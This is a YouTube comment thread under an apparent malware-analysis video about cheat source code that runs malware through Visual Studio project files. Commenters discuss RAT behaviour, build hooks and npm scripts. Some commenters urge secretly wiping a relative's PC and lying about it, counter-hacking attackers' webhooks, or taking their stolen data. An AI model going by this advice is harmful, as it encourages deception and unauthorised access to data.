The threat actor was playing with you. I have had that exact experience before in real life and I still get nightmares to this day. My father has a RAT on his crappy little work computer that died some time ago, Zeus, but refuses to clean the PC or allow anything to be touched. It's so bad, can't even plug a phone into it that is an older phone or it will get infected too. New phones are fine. It jumpscares him at night, it's programmed to go through some kind of sequence of actions at night time with browsing the internet with ads. All the stuff it messes with makes the entire PC just feel extremely creepy to use, I have no idea how he sleeps at night knowing that PC is bugged and constantly mining ETH.
yeah no. go on his computer when he's not looking and fact reset that thing. you can factory reset in literally 30 seconds and i guarantee you it's a good thing to do here. fac reset it, and blame it on the malware / RAT on the computer messing it up and doing that itself (it already messes with him at night)
About discord webhooks, they have a feature where you can delete them just by having its url, no need for having access to some control over it It's meant to help get rid of leaked links, so anyone can delete it if gets leaked, but also helpfull if you find malware with web hook link
Maybe not just delete them. Most of those trash tier malware comes from other open source skidware projects on GitHub. It's easy to generate fake messages in the exact format, and render the data useless on the receivers' end. :)
Unfortunately since it's behind the website proxy, you cannot delete them in this manner. Still, it's nice to know in case you come across a malicious webhook.
Thank you Eric for showcasing an example of this, since I've never seen it on action. IDEs (Visual Studio in this case) support running code for various reasons (mainly for automation of annoying tasks) at initializing a project, building it, exporting it, etc. This feature can be used for legit purposes, but also to run malware like this "cheat source code" does. Building from source code is not a completely safe process if you don't know *exactly* what you're dealing with. Additionally, not only the projects can be used to infect users, but also plugins, libraries and other components of the IDE that can be changed by the user.
I love "solution" files and other crap that executes arbitrary code for god knows what reason. The next on the list is npm and its pre and post scripts.
Sometimes they do important things that make setup easier. The problem is that we've gotten into the habit of trusting random source code from the Internet. In my day, if there was something wrong, you could blame your coworkers.
@@olexayko Whats right with it? I've maintained many different applications that use npm and they were all a disaster. Transitive dependencies balloon what projects you depend on. I see things pulled in that aren't used but no one removes in case there is something it does we don't see. Dependencies that are out of date and cannot be upgraded without upgrading everything. npm makes it easy to create a terrible application.
Thank you Eric that you channel exists, this is exactly the type of opsec that we need more of on youtube. Simple demos of behaviours in context. Keep it up thank you 👍
They usually come loaded with Visual Basic "prank" scripts (or code that does the same thing). They can also hide the taskbar, disable right-clicking, flip the desktop, make the CD tray open and close sporadically (if you have one), change the wallpaper, display a fake BSOD, etc. They pretty much give you access akin to being physically in front of the machine.
If you ever come across their upload area, best to just keep sending random junk to it (made to look like what they are looking for) until it either exceeds their service limit (some free services, which you can also report for abuse) or they get fed up with fake stuff. For tgram bot uploads, it is also possible to delete all of their stolen stuff if you want to (or steal it yourself, to maybe identify and warn the owners of the data).
.Net 4 is still supported. It literally says supported versions on the download page you clicked. My guess is they want 4.x since it’s the last version that includes the command line compiler (csc.exe) to build the malware on the target.
I quickly recognized the format of the .suo file, that's a compound binary file format from Microsoft. You're right about the it'd-16 strings, since names of streams/storages are stored using utf-16 (can't remember if they support the big endian version, but I usually only see little endian) I actually work with outlook message files a ton so I recognized its parent format super quickly. If you want to analyze it some more and figure out what the parts are, there are a few Python modules that can do it easily, though the one I know best is olefile I also know that I've worked with them too much when I knew exactly what all of the ff ff ff ff sections are for (nodes that are empty)
Crazy how I'm earning a bachelor's in cybersecurity but my University might as well just be a certification Farm atp because I learn everything awesome in the evening from channels like yours.
0:35 the correct option is actually to open with "Visual Studio Version Selector", because if you have multiple versions of Visual Studio, it'll automatically open the it with the version that matches the solution
Is putty a virus as I saw that on my PC after Christmas day 2022 after looking online and installing Sony's proprietary memory card formatting tool as they took it down from their website then all my desktop icons had speakers on them instead of the arrow but I'm still not sure that was the culprit as a piece of software I used to use a lot from the Microsoft Store was causing all sorts of problems and since that Christmas I never used either again it was very scary I wanted to get a recording of it but I didn't know if my PC would make it if I did so I held the power button until it shut off and I didn't touch it again until half way through the following year and the only thing that threw an error during the force shutdown was that software from the Microsoft Store and it was a very dodgy error (fake error) the error was nonsense here is an example of basically what it was saying: Error Software is Working Fine (that's what I mean it was just nonsense) that's not what it said it was just the only example that came to mind sorry
Just want to add the non destructive removal isnt really something anyone should rely on. If you are hit this ahrs there is only one solution. Reinstall. And even then that moght not be enough if it has embedded itself in other places than your OS.
Is this about FodyWeaver specifically? I've encountered that before because of another developer but I had removed it at the time, seeing it as unnecessary.
I'm sure they know about it too funnily enough, as they have a security feature for Visual Studio Code that blocks executing anything from untrusted directories by default.
As someone who has coded mod menus and programs programs for cod games i had false positives hits running virustotal on them but this definitely has a virus in it lol
hi eric, could you try to look at some JAR files for minecraft, there is a huge community for skyblock (a game on hypixel) and there is a LOT of ratting happening, like every second mod is a rat. could you maybe try to make a video on how to see if code is malicious or not
Hey, I'm looking for the program you used FRST64/Farba recovery tool, I want to download it from a trusted source but I'm not sure which source I can trust, if someone could help me please
can't tell you 1. that's dangerous, it can infect your pc involuntarily by accidental clicks 2. bad actors can spread it to cause chaos 3. thats illegal 4. google's TOS says otherwise.
just dont use cheats? its really not that hard to NOT ruin the experience for everyone else, yourself included. Im glad there is malware in this, cheaters deserve to have to re-install windows and lose all their files.
saying that like if its not gonna take a whole year to learn coding, reverse code engineering, assembly and getting around anti-cheats. Maybe just be legit and dont cheat. And if you suck, then get good.
In semi related news, I just got an email about the GTA:SA leak people are talking about. Apparently it is fake and contains a malicious exe, source: www.heise.de/en/news/Leaked-source-code-of-GTA-San-Andreas-allegedly-contains-ransomware-10228731.html
@user-lx2ep9hd4k might be crackable by guessing keywords. Tominecon was a old encrypted mineraft related zip file that got cracked last year. Not by breaking the encryption but by automatically trying passwords from leaks and databreaches
@@Glockenspiels "Visual studio project" is not a thing. You probably meant Code OSS, a.k.a. Visual sudio code - open source, which is made by microsoft the same way that chromium and android are made by google.
Great channell! can you please make a video about how to recognize and determine all the files run in task manage. How to recognize what is what ? how to research service-hosts etc ?
wow thats so cool bro, what a freaking bad ass(sorry for swearing), can i be your friend? NO ONE CARES LMAO. You're literally like 10 years old. Be a good little Timmy and dont go around downloading cheats for online games, it ruins the fun for us adults who just want to relax and enjoy an online video game.
Can't believe the threat actor tried to viciously paw at you in real time.
big fan
@@randallvargas4457 massive celling fan
He must have realized he is analysing his malware
The threat actor was playing with you. I have had that exact experience before in real life and I still get nightmares to this day.
My father has a RAT on his crappy little work computer that died some time ago, Zeus, but refuses to clean the PC or allow anything to be touched. It's so bad, can't even plug a phone into it that is an older phone or it will get infected too. New phones are fine. It jumpscares him at night, it's programmed to go through some kind of sequence of actions at night time with browsing the internet with ads. All the stuff it messes with makes the entire PC just feel extremely creepy to use, I have no idea how he sleeps at night knowing that PC is bugged and constantly mining ETH.
factory reset the computer
yeah no. go on his computer when he's not looking and fact reset that thing. you can factory reset in literally 30 seconds and i guarantee you it's a good thing to do here. fac reset it, and blame it on the malware / RAT on the computer messing it up and doing that itself (it already messes with him at night)
@@NotH4llow if pc reset process is broken just flash a usb and reinstall windows
@@melj2j or rip out the cpu. force a repair
I'm unironically invested by this comment, could you bring out some updates or even more descriptions regarding your father's computer?!
The threat actor managing to connect was definitely a jumpscare
About discord webhooks, they have a feature where you can delete them just by having its url, no need for having access to some control over it
It's meant to help get rid of leaked links, so anyone can delete it if gets leaked, but also helpfull if you find malware with web hook link
Maybe not just delete them. Most of those trash tier malware comes from other open source skidware projects on GitHub. It's easy to generate fake messages in the exact format, and render the data useless on the receivers' end. :)
Unfortunately since it's behind the website proxy, you cannot delete them in this manner. Still, it's nice to know in case you come across a malicious webhook.
Holy shit the RAT guy connected!! That's crazy
when? timestamp?
@@UrokLizard 7:16
They have a whole team of exploiters on call 24h. I'm surprised they didn't connect sooner.
the trolling lol
Thank you Eric for showcasing an example of this, since I've never seen it on action. IDEs (Visual Studio in this case) support running code for various reasons (mainly for automation of annoying tasks) at initializing a project, building it, exporting it, etc. This feature can be used for legit purposes, but also to run malware like this "cheat source code" does. Building from source code is not a completely safe process if you don't know *exactly* what you're dealing with.
Additionally, not only the projects can be used to infect users, but also plugins, libraries and other components of the IDE that can be changed by the user.
I love "solution" files and other crap that executes arbitrary code for god knows what reason. The next on the list is npm and its pre and post scripts.
Sometimes they do important things that make setup easier. The problem is that we've gotten into the habit of trusting random source code from the Internet. In my day, if there was something wrong, you could blame your coworkers.
NPM is a scourge even without malware hooking into it
whats wrong with npm?
@@olexayko Whats right with it? I've maintained many different applications that use npm and they were all a disaster. Transitive dependencies balloon what projects you depend on. I see things pulled in that aren't used but no one removes in case there is something it does we don't see. Dependencies that are out of date and cannot be upgraded without upgrading everything. npm makes it easy to create a terrible application.
@@username7763 damn. sounds bad
Thank you Eric that you channel exists, this is exactly the type of opsec that we need more of on youtube. Simple demos of behaviours in context. Keep it up thank you 👍
I wonder what it would be like to watch the bad actor mess around with the vm, what key points they would target, things they'll generally do.
Neat, I didn't know a RAT could invert the mouse click... Now I wonder if my primary desktop got compromised a few years back
U can basically do anything if u have a rat
They usually come loaded with Visual Basic "prank" scripts (or code that does the same thing). They can also hide the taskbar, disable right-clicking, flip the desktop, make the CD tray open and close sporadically (if you have one), change the wallpaper, display a fake BSOD, etc. They pretty much give you access akin to being physically in front of the machine.
Doing too much all at once is one hell of a distraction and it's meant to be.
If you ever come across their upload area, best to just keep sending random junk to it (made to look like what they are looking for) until it either exceeds their service limit (some free services, which you can also report for abuse) or they get fed up with fake stuff. For tgram bot uploads, it is also possible to delete all of their stolen stuff if you want to (or steal it yourself, to maybe identify and warn the owners of the data).
Eric is probably one of the best channels to watch when you have to wake up in 4 hours. cool stuff analysis, good software/general advice.
“Hello everybody” not fast enough
I’d love to see what the threat actor does once they connect to the machine, out of morbid curiosity
.Net 4 is still supported. It literally says supported versions on the download page you clicked. My guess is they want 4.x since it’s the last version that includes the command line compiler (csc.exe) to build the malware on the target.
hey eric! just wanted to let you know that i really value your videos and that i have learnt a lot.
You can delete a discord webhook via api stuff. you dont have to work at discord to do it.
if we don't know the actual webhook.
@ oh fair point. there is always ways to reverse engineer. i dont know how the webhook gets stored for the website baaed stuff through.
I quickly recognized the format of the .suo file, that's a compound binary file format from Microsoft. You're right about the it'd-16 strings, since names of streams/storages are stored using utf-16 (can't remember if they support the big endian version, but I usually only see little endian)
I actually work with outlook message files a ton so I recognized its parent format super quickly. If you want to analyze it some more and figure out what the parts are, there are a few Python modules that can do it easily, though the one I know best is olefile
I also know that I've worked with them too much when I knew exactly what all of the ff ff ff ff sections are for (nodes that are empty)
Crazy how I'm earning a bachelor's in cybersecurity but my University might as well just be a certification Farm atp because I learn everything awesome in the evening from channels like yours.
I have an online friend who's been saying the same thing with stuff I share with him lol schools need to step up
5:06: wtf was that RAR file …
0:35 the correct option is actually to open with "Visual Studio Version Selector", because if you have multiple versions of Visual Studio, it'll automatically open the it with the version that matches the solution
Doesn't really matter considering this is a VM & not some kind of tutorial on using visual studio.
@Lorh_o yeah, doesn't really matter in this case, I just wanted to point it out
13:04 an “x client” could also refer to a client for the x windowing system, which may be more common
Why would it be on Windows, though?
Maybe for Windows Subsystem for Linux?
Is putty a virus as I saw that on my PC after Christmas day 2022 after looking online and installing Sony's proprietary memory card formatting tool as they took it down from their website then all my desktop icons had speakers on them instead of the arrow but I'm still not sure that was the culprit as a piece of software I used to use a lot from the Microsoft Store was causing all sorts of problems and since that Christmas I never used either again it was very scary I wanted to get a recording of it but I didn't know if my PC would make it if I did so I held the power button until it shut off and I didn't touch it again until half way through the following year and the only thing that threw an error during the force shutdown was that software from the Microsoft Store and it was a very dodgy error (fake error) the error was nonsense here is an example of basically what it was saying: Error Software is Working Fine (that's what I mean it was just nonsense) that's not what it said it was just the only example that came to mind sorry
Just want to add the non destructive removal isnt really something anyone should rely on. If you are hit this ahrs there is only one solution. Reinstall. And even then that moght not be enough if it has embedded itself in other places than your OS.
Not really done other than by state actors.
You are misinformed @@FadkinsDiet
@@FadkinsDiet Zeus loves phones.
Is this about FodyWeaver specifically? I've encountered that before because of another developer but I had removed it at the time, seeing it as unnecessary.
5:20 what the hell, i just saw when the video was posted, but i knew about this type of code execution for like half a year, damn Microsoft
I'm sure they know about it too funnily enough, as they have a security feature for Visual Studio Code that blocks executing anything from untrusted directories by default.
As someone who has coded mod menus and programs programs for cod games i had false positives hits running virustotal on them but this definitely has a virus in it lol
The only serious viruses I've ever had infect my computer were from game or other software cracks.
I was doing some of my own analysis on a program but it seems to bluescreen once you try and debug it, any tips?
please someone explain from where he got this source code and what does this code do in
summary ?
What distro did you use to film this? (I saw you using KDE Plamsa when configuring the VM)
hi eric, could you try to look at some JAR files for minecraft, there is a huge community for skyblock (a game on hypixel) and there is a LOT of ratting happening, like every second mod is a rat. could you maybe try to make a video on how to see if code is malicious or not
ps i could show some examples which are well known
hey Eric what is the oficial download for process explorer?
microsoft store sysinternals suite
@@jakem5039 Thanks!
will you make a video about nl hybired my anti viras say it a virous but they say it is a false posotive
Is this a new exploit?
ye
.suo exploit has been around for a good minute
Hey, I'm looking for the program you used FRST64/Farba recovery tool, I want to download it from a trusted source but I'm not sure which source I can trust, if someone could help me please
that's crazy someone tried to crash the party lol
Lesson: Never get cheats for video games
Lesson: Download from trusted sources, and check whatever you're installing
@@chief-u3f That one too
Or if you do at least don't be a fool about it
Just create them yourself
@@chief-u3f That one too (TH-cam deleted my reply :()
Why you did this on Windows 10?
Can you test a roblox exploit called swift ?
Wait, am i correct to assume this malware doesnt check anything Firefox related since it only looked at Chrome and Edge?
Not worth it, Firefox has such small market share
@@FadkinsDiet Meaning im immune to this malware! (not really lol but atleast the session grabber)
it steals firefox too
I am not gonna download anything no more
for me xclient sounds like something for X11
POV: You rat someone go onto the PC and see its Eric parker 💀
2:38 - Oh God good to see I'm not alone with that particular issue (Firefox just being broken for me it was Reddit being the most broken)
Can you check if project nocturno is legit?
Can you see if roblox executor: Solara is a malicious program?
MS-HTA vs MS-Heych-TA
FIGHT!
FIGHT vs FIGCHT
MS-Hoo Tee Aaa
hey, where did you download FRST64, whats the source?
can't tell you
1. that's dangerous, it can infect your pc involuntarily by accidental clicks
2. bad actors can spread it to cause chaos
3. thats illegal
4. google's TOS says otherwise.
Can you make a video about NLHybrid i don’t know if it’s a virus or not
It's safe i used it and so does my friend who was a old mod
Never thought that source code can be malware.. Now im pretty sure i have malware on my pc. thanks for explanation buddy, ill be more carefull
can you make video about NL Hybrid please!?
can you make a wire guard tutorial
Could you do a qemu tutorial?
Just don't use cheats off the internet. Make your own.
Just don't play games that you need cheats to play. Make your own games.
@@hereniho Don't play on the operating system just make your own.
just dont use cheats? its really not that hard to NOT ruin the experience for everyone else, yourself included.
Im glad there is malware in this, cheaters deserve to have to re-install windows and lose all their files.
@@selectionn Who ruined your Fortnite experience? People are gonna cheat, might as well be smart enough to make your own.
saying that like if its not gonna take a whole year to learn coding, reverse code engineering, assembly and getting around anti-cheats. Maybe just be legit and dont cheat. And if you suck, then get good.
The irony of using Opera while analyzing malware
Also, inverting the mouse buttons may indicate the RATer being left-handed.
no he just spammed every "fun" feature existing in their malware
@ Yeah, probably.
lets all love lain
Yo E can you do one on pulover's macro creator they say it has malware.
Am I the only one taking offence to opening a .proj file downloading and running .exe files without asking?
paws at eric
bot
@@grekandrew8995 im not a bot...???
nap time for you
@@Vaximous eepy
:3
This was a very neat video, today I learned.
Do a video on the fake CAPTCHA pages used to distribute infostealers
Comment to boost the algorithm, incredible work
Shit's scary
In semi related news, I just got an email about the GTA:SA leak people are talking about. Apparently it is fake and contains a malicious exe, source: www.heise.de/en/news/Leaked-source-code-of-GTA-San-Andreas-allegedly-contains-ransomware-10228731.html
It's fake news. The real one is called gtasasc.7z while this guy shows gtasa.7z
As for the real zip, nobody knows the password
@user-lx2ep9hd4k might be crackable by guessing keywords. Tominecon was a old encrypted mineraft related zip file that got cracked last year. Not by breaking the encryption but by automatically trying passwords from leaks and databreaches
yea if that happens to me im just installing windows again
so the antivirus are scam..
child birth is a scam.
he used xworm on the vm
NOO WAYY THATS CRAZY!!!
yo i'm on time
omg miku hi big fan
@KayleighOwO your name seems familiar
@miku10v3 meow :3
@@KayleighOwO meow~ :3
Another reason to switch to cmake.
I hate microsoft
We all do, mate. We all do.
@@какойтошизик What would happen if microsoft suddenly lost all windows source code after Windows 7?
If you aren't smart enough to make your own cheats, that's a you problem buddy.
thanks eric
hi eric parker
whos here from iiDk?
ok
So this is a Microsoft specific exploit? One more reason to not use VS Code.
:clueless:
@@min3craftpolska514 You forgot to write anything in your comment.
not vs code, but visual studio project.
@@Glockenspiels "Visual studio project" is not a thing. You probably meant Code OSS, a.k.a. Visual sudio code - open source, which is made by microsoft the same way that chromium and android are made by google.
eric you got some nice 127gb of ram and a quite of good amd ryzen threadripper pro 3995WX 64-Cores ;)
hii
Hi
hi
wtf
Why are there so many children here asking you to look at roblox malware 😂
damn
eric i love you
WAKE UP F1LTHY
Type shii
ericsniped
Great channell!
can you please make a video about how to recognize and determine all the files run in task manage. How to recognize what is what ? how to research service-hosts etc ?
conclusion: only aquire open-source software from trusted code hosting websites, like github, gitlab, gitea, sourcehut, etc
Lol there is so much malware on github he's even made a video about it
@@mrtz187 I used gitea for our team. highly recommend
git will let anyone post anything.
no, conclusion: don't download project files, build it yourself instead & check the source code before.
@@monkaSisLife are makefiles safer?
crazy how im friends with the guy who made this xd
💀
wow thats so cool bro, what a freaking bad ass(sorry for swearing), can i be your friend?
NO ONE CARES LMAO. You're literally like 10 years old. Be a good little Timmy and dont go around downloading cheats for online games, it ruins the fun for us adults who just want to relax and enjoy an online video game.
blud youre a snitch
i know the owner of this
if u want more info, reponde to this message
and if u wanna know where its hidden just repond
@@塞kyoto塞 12 year olds thinking they are cool lmao so cringe
sugma
@@塞kyoto塞I'm gonna stalk this account and report everything it does.
yo eric, you should chekc out exit lag, ive seen rumours about it being a RAT and i have it and am a little worried
hi